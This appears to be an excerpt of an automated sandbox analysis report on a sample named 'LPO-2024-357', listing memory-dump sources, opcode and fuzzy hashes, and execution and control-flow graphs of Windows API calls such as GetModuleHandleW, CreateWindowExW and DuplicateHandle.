                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ae4624af341d3f173a5ebf6d80cc4d401917ee7bc89249369da0320ad7e05df8
                                                                                                      • Instruction ID: 717b26f3e0b65239eca22dbd056287630c0d70be588ecfa43d159712f03ff73b
                                                                                                      • Opcode Fuzzy Hash: ae4624af341d3f173a5ebf6d80cc4d401917ee7bc89249369da0320ad7e05df8
                                                                                                      • Instruction Fuzzy Hash: D6D1E63192075ACACB10EFA4D9906D9B7B1FFA5304F60D79AE00937625EF706AC4DB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1700837785.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7640000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 985e93fad610ef8621e34a4ddc6018ea2e570d2e7e278017b6898f2bdfdcbcb5
                                                                                                      • Instruction ID: 2c5dbb8b816705f12f698ccd324b5ba452d0ae112e7b62f44ca6cbc990e54e9e
                                                                                                      • Opcode Fuzzy Hash: 985e93fad610ef8621e34a4ddc6018ea2e570d2e7e278017b6898f2bdfdcbcb5
                                                                                                      • Instruction Fuzzy Hash: 01A1A070A00259CFCB05DFA9C894AEDBBF2FF89300F5485A9E406BB359DB706945CB80

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:8%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:166
                                                                                                      Total number of Limit Nodes:22
                                                                                                      execution_graph 23485 5edfb3c 23486 5edb410 GetModuleHandleW 23485->23486 23487 5edfb58 23486->23487 23351 d7b070 DuplicateHandle 23352 d7b106 23351->23352 23488 5edf390 23489 5edf3f8 CreateWindowExW 23488->23489 23491 5edf4b4 23489->23491 23353 d7be98 23354 d7bec6 23353->23354 23357 d7b940 23354->23357 23356 d7bee6 23358 d7b94b 23357->23358 23359 d7c60c 23358->23359 23362 d7e8a0 23358->23362 23367 d7e870 23358->23367 23359->23356 23363 d7e8c1 23362->23363 23364 d7e8e5 23363->23364 23372 d7ea50 23363->23372 23376 d7ea40 23363->23376 23364->23359 23368 d7e8c1 23367->23368 23369 d7e8e5 23368->23369 23370 d7ea50 GetModuleHandleW 23368->23370 23371 d7ea40 GetModuleHandleW 23368->23371 23369->23359 23370->23369 23371->23369 23374 d7ea5d 23372->23374 23373 d7ea96 23373->23364 23374->23373 23380 d7c354 23374->23380 23377 d7ea5d 23376->23377 23378 d7ea96 23377->23378 23379 d7c354 GetModuleHandleW 23377->23379 23378->23364 23379->23378 23381 d7c35f 23380->23381 23383 d7eb08 23381->23383 23384 d7c388 23381->23384 23383->23383 23385 d7c393 23384->23385 23389 5edbea8 23385->23389 23398 5edbe95 23385->23398 23386 d7ebb1 23386->23383 23391 5edbed9 23389->23391 23393 5edbfd9 23389->23393 23390 5edbee5 23390->23386 23391->23390 23407 5edc2bb 23391->23407 23413 5edc2c0 23391->23413 23392 5edbf25 23418 5edde88 23392->23418 23425 5edde98 23392->23425 23400 5edbed9 23398->23400 23402 5edbfd9 23398->23402 23399 5edbee5 23399->23386 23400->23399 23403 5edc2bb GetModuleHandleW 23400->23403 23404 5edc2c0 GetModuleHandleW 23400->23404 23401 5edbf25 23405 5edde88 GetModuleHandleW 23401->23405 23406 5edde98 GetModuleHandleW 23401->23406 23403->23401 23404->23401 23405->23402 23406->23402 23408 5edc2c0 23407->23408 23432 5edc32c 23408->23432 23436 5edc310 23408->23436 23442 5edc300 23408->23442 23409 5edc2ca 23409->23392 23415 5edc32c GetModuleHandleW 23413->23415 23416 5edc300 GetModuleHandleW 23413->23416 23417 5edc310 GetModuleHandleW 23413->23417 23414 5edc2ca 23414->23392 23415->23414 23416->23414 23417->23414 23419 5edde98 23418->23419 23455 5ede3f0 23419->23455 23460 5ede400 23419->23460 23420 5eddf46 23421 5eddf72 23420->23421 23422 5edb410 GetModuleHandleW 23420->23422 23421->23421 23422->23421 23426 5eddec3 23425->23426 23430 5ede400 GetModuleHandleW 23426->23430 23431 5ede3f0 GetModuleHandleW 23426->23431 23427 5eddf46 23428 5edb410 GetModuleHandleW 23427->23428 23429 5eddf72 23427->23429 23428->23429 23430->23427 23431->23427 23433 5edc330 23432->23433 23434 5edc33c 23432->23434 23448 5edc598 23433->23448 23434->23409 23437 5edc321 23436->23437 23440 5edc33c 23436->23440 23438 5edc32c 23437->23438 23439 5edb410 GetModuleHandleW 23437->23439 23438->23440 23441 5edc598 GetModuleHandleW 23438->23441 23439->23438 23440->23409 23441->23440 23443 5edc321 23442->23443 23446 5edc33c 23442->23446 23444 5edc32c 23443->23444 23445 5edb410 GetModuleHandleW 23443->23445 23444->23446 23447 5edc598 GetModuleHandleW 23444->23447 23445->23444 23446->23409 23447->23446 23451 5edb410 23448->23451 23450 5edc5bc 23450->23434 23452 5edc500 GetModuleHandleW 23451->23452 23454 5edc575 23452->23454 23454->23450 23456 5ede403 23455->23456 23457 5ede4ae 23456->23457 23465 5ede561 23456->23465 23475 5ede570 23456->23475 23461 5ede42d 23460->23461 23462 5ede4ae 23461->23462 23463 5ede561 GetModuleHandleW 23461->23463 23464 5ede570 GetModuleHandleW 23461->23464 23463->23462 23464->23462 23466 5ede573 23465->23466 23467 5edb410 GetModuleHandleW 23466->23467 23468 5ede5a9 23466->23468 23467->23468 23469 5edb410 GetModuleHandleW 23468->23469 23474 5ede765 23468->23474 23470 5ede6eb 23469->23470 23471 5edb410 GetModuleHandleW 23470->23471 23470->23474 23472 5ede739 23471->23472 23473 5edb410 GetModuleHandleW 23472->23473 23472->23474 23473->23474 23474->23457 23476 5ede585 23475->23476 23477 5edb410 GetModuleHandleW 23476->23477 23478 5ede5a9 23476->23478 23477->23478 23479 5edb410 GetModuleHandleW 23478->23479 23481 5ede765 23478->23481 23480 5ede6eb 23479->23480 23480->23481 23482 5edb410 GetModuleHandleW 23480->23482 23481->23457 23483 5ede739 23482->23483 23483->23481 23484 5edb410 GetModuleHandleW 23483->23484 23484->23481 23492 d78fa8 23496 d78fad 23492->23496 23493 d78fcb 23496->23493 23497 d78fd1 23496->23497 23502 d78fe0 23496->23502 23498 d78ff6 23497->23498 23499 d790a7 23498->23499 23507 d7d103 23498->23507 23514 d7d118 23498->23514 23499->23496 23503 d78ff6 23502->23503 23504 d790a7 23503->23504 23505 d7d103 GetModuleHandleW 23503->23505 23506 d7d118 GetModuleHandleW 23503->23506 23504->23496 23505->23503 23506->23503 23508 d7d0fd 23507->23508 23508->23507 23509 d7da1e 23508->23509 23521 5ed2a51 23508->23521 23526 5ed2b03 23508->23526 23531 5ed2a10 23508->23531 23536 5ed2a60 23508->23536 23509->23498 23515 d7d130 23514->23515 23516 d7da1e 23515->23516 23517 5ed2a51 GetModuleHandleW 23515->23517 23518 5ed2a60 GetModuleHandleW 23515->23518 23519 5ed2a10 GetModuleHandleW 23515->23519 23520 5ed2b03 GetModuleHandleW 23515->23520 23516->23498 23517->23515 23518->23515 23519->23515 23520->23515 23523 5ed2a56 23521->23523 23522 5ed2b19 23523->23522 23541 5edbd68 23523->23541 23546 5edbd50 23523->23546 23527 5ed2ad8 23526->23527 23528 5ed2b19 23527->23528 23529 5edbd68 GetModuleHandleW 23527->23529 23530 5edbd50 GetModuleHandleW 23527->23530 23528->23528 23529->23527 23530->23527 23533 5ed2a1d 23531->23533 23532 5ed2b19 23533->23532 23534 5edbd68 GetModuleHandleW 23533->23534 23535 5edbd50 GetModuleHandleW 23533->23535 23534->23533 23535->23533 23538 5ed2a7d 23536->23538 23537 5ed2b19 23538->23537 23539 5edbd68 GetModuleHandleW 23538->23539 23540 5edbd50 GetModuleHandleW 23538->23540 23539->23538 23540->23538 23543 5edbd82 23541->23543 23542 5edbe6b 23543->23542 23544 5edbea8 GetModuleHandleW 23543->23544 23545 5edbe95 GetModuleHandleW 23543->23545 23544->23543 23545->23543 23548 5edbd5c 23546->23548 23547 5edbe6b 23548->23547 23549 5edbea8 GetModuleHandleW 23548->23549 23550 5edbe95 GetModuleHandleW 23548->23550 23549->23548 23550->23548

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 968 5edf385-5edf3f6 970 5edf3f8-5edf3fe 968->970 971 5edf401-5edf408 968->971 970->971 972 5edf40a-5edf410 971->972 973 5edf413-5edf44b 971->973 972->973 974 5edf453-5edf4b2 CreateWindowExW 973->974 975 5edf4bb-5edf4f3 974->975 976 5edf4b4-5edf4ba 974->976 980 5edf4f5-5edf4f8 975->980 981 5edf500 975->981 976->975 980->981 982 5edf501 981->982 982->982
                                                                                                      APIs
                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05EDF4A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.2927247442.0000000005ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05ED0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5ed0000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 716092398-0
                                                                                                      • Opcode ID: 5cb07414b29920d139c63227224835e05ea3f28ee177ec67e6a4c33f322f1038
                                                                                                      • Instruction ID: f9c26e21e5ae87d8a07906f419da3ea783df206f1d5574082059911539eb5b84
                                                                                                      • Opcode Fuzzy Hash: 5cb07414b29920d139c63227224835e05ea3f28ee177ec67e6a4c33f322f1038
                                                                                                      • Instruction Fuzzy Hash: F051D2B1D10349DFDB14CF9AD984ADEFBB5BF88314F24812AE819AB210D775A845CF90

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 983 5edf390-5edf3f6 984 5edf3f8-5edf3fe 983->984 985 5edf401-5edf408 983->985 984->985 986 5edf40a-5edf410 985->986 987 5edf413-5edf4b2 CreateWindowExW 985->987 986->987 989 5edf4bb-5edf4f3 987->989 990 5edf4b4-5edf4ba 987->990 994 5edf4f5-5edf4f8 989->994 995 5edf500 989->995 990->989 994->995 996 5edf501 995->996 996->996
                                                                                                      APIs
                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05EDF4A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.2927247442.0000000005ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05ED0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5ed0000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 716092398-0
                                                                                                      • Opcode ID: b0a9bcaaf0113e18a85ef5f1d4355d6cfbe8e28e36b2ede3bf7998fc11a6d713
                                                                                                      • Instruction ID: 5a63e0855b20191004b4c85c5f17571f0b6c3df4586e3357a77f08ccdc1f768a
                                                                                                      • Opcode Fuzzy Hash: b0a9bcaaf0113e18a85ef5f1d4355d6cfbe8e28e36b2ede3bf7998fc11a6d713
                                                                                                      • Instruction Fuzzy Hash: 7341BEB1D10349DFDB14CF9AC984ADEFBB5BF88314F24912AE819AB210D775A845CF90

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 997 d7b068-d7b06b 998 d7b070-d7b104 DuplicateHandle 997->998 999 d7b106-d7b10c 998->999 1000 d7b10d-d7b12a 998->1000 999->1000
                                                                                                      APIs
                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D7B0F7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.2922887898.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_d70000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DuplicateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 3793708945-0
                                                                                                      • Opcode ID: 90c3470305cb906e4112de5bf0693dcb5170916e28e4ab5236378574a5479e8a
                                                                                                      • Instruction ID: 37def5aa2d804b508fcceaa21550a913635c632f48f902246b64063ebf1a3664
                                                                                                      • Opcode Fuzzy Hash: 90c3470305cb906e4112de5bf0693dcb5170916e28e4ab5236378574a5479e8a
                                                                                                      • Instruction Fuzzy Hash: D921E3B5D002499FDB10CF9AD984ADEBFF9EB48320F14841AE918A3350D379A944CFA4

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1003 d7b070-d7b104 DuplicateHandle 1004 d7b106-d7b10c 1003->1004 1005 d7b10d-d7b12a 1003->1005 1004->1005
                                                                                                      APIs
                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D7B0F7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.2922887898.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_d70000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DuplicateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 3793708945-0
                                                                                                      • Opcode ID: f83e89b7c51c24534a2be6666ec1b1b5afb33eccc5b6a14d368982f5a618fae9
                                                                                                      • Instruction ID: 8fa79b9cedd4aaa02d72ed866d2998cccdef46e5845f76751203f3b1be56494e
                                                                                                      • Opcode Fuzzy Hash: f83e89b7c51c24534a2be6666ec1b1b5afb33eccc5b6a14d368982f5a618fae9
                                                                                                      • Instruction Fuzzy Hash: 8F21C4B5900249DFDB10CF9AD984ADEBFF9FB48320F14841AE918A7350D379A944CFA5

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1008 5edb410-5edc540 1010 5edc548-5edc573 GetModuleHandleW 1008->1010 1011 5edc542-5edc545 1008->1011 1012 5edc57c-5edc590 1010->1012 1013 5edc575-5edc57b 1010->1013 1011->1010 1013->1012
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,05EDC32C), ref: 05EDC566
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.2927247442.0000000005ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05ED0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_5ed0000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 4139908857-0
                                                                                                      • Opcode ID: 7cb689517bcd705ebd2e76fdc6be82eeb28040dc0b279c273ea494ab1c03bd81
                                                                                                      • Instruction ID: b3c92f93a910a27bf16ad8860feaa8f8f38575f8f612b4ff49adb1dbcdfe084d
                                                                                                      • Opcode Fuzzy Hash: 7cb689517bcd705ebd2e76fdc6be82eeb28040dc0b279c273ea494ab1c03bd81
                                                                                                      • Instruction Fuzzy Hash: FB1134B1C003098FCB20DF9AC548BDEFBF4EB88254F20805AD459B7200D375A945CFA4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.2921988557.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_b2d000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f26f18612cb1d2902c263dc1101f1f336fb2f829ec29ce5c6de577cf6f6ad0ed
                                                                                                      • Instruction ID: ff96d6fe634537af191f0d8f3f63c7fefd35d8b70c6cd9d2c664128e21d0a273
                                                                                                      • Opcode Fuzzy Hash: f26f18612cb1d2902c263dc1101f1f336fb2f829ec29ce5c6de577cf6f6ad0ed
                                                                                                      • Instruction Fuzzy Hash: 8921F575504240DFCB14DF14E5D0B27BBA5FB84314F24C5ADD94E4B2A6C736D847CA61
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.2921988557.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_b2d000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cc66e1d3b7f54f22f922c8ed0dcfe14af378c6f9f2467d451a6410226f410ae0
                                                                                                      • Instruction ID: beb2ca04959e87a3953769e4fa30bdb97f1542da4885191996f33cfd509416f5
                                                                                                      • Opcode Fuzzy Hash: cc66e1d3b7f54f22f922c8ed0dcfe14af378c6f9f2467d451a6410226f410ae0
                                                                                                      • Instruction Fuzzy Hash: 772162755083809FDB12CF14D994B16BFB1EB46314F28C5DAD8498F2A7C33AD85ACB62
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.2921906565.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_b0d000_LPO-2024-357.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a6fc842c7d509e595450c5bb27c83a4e0b785df3eb4e89413ebefe52e99812b7
                                                                                                      • Instruction ID: 4b549d1a6736b1611816805c9367108e5d5067faac399d43541c4a64cb81e54e
                                                                                                      • Opcode Fuzzy Hash: a6fc842c7d509e595450c5bb27c83a4e0b785df3eb4e89413ebefe52e99812b7
                                                                                                      • Instruction Fuzzy Hash: D3F062715043449AE7208A5ADDC4B62FFD8EB51724F18C59AED0C4A2C6C67A9844CBB1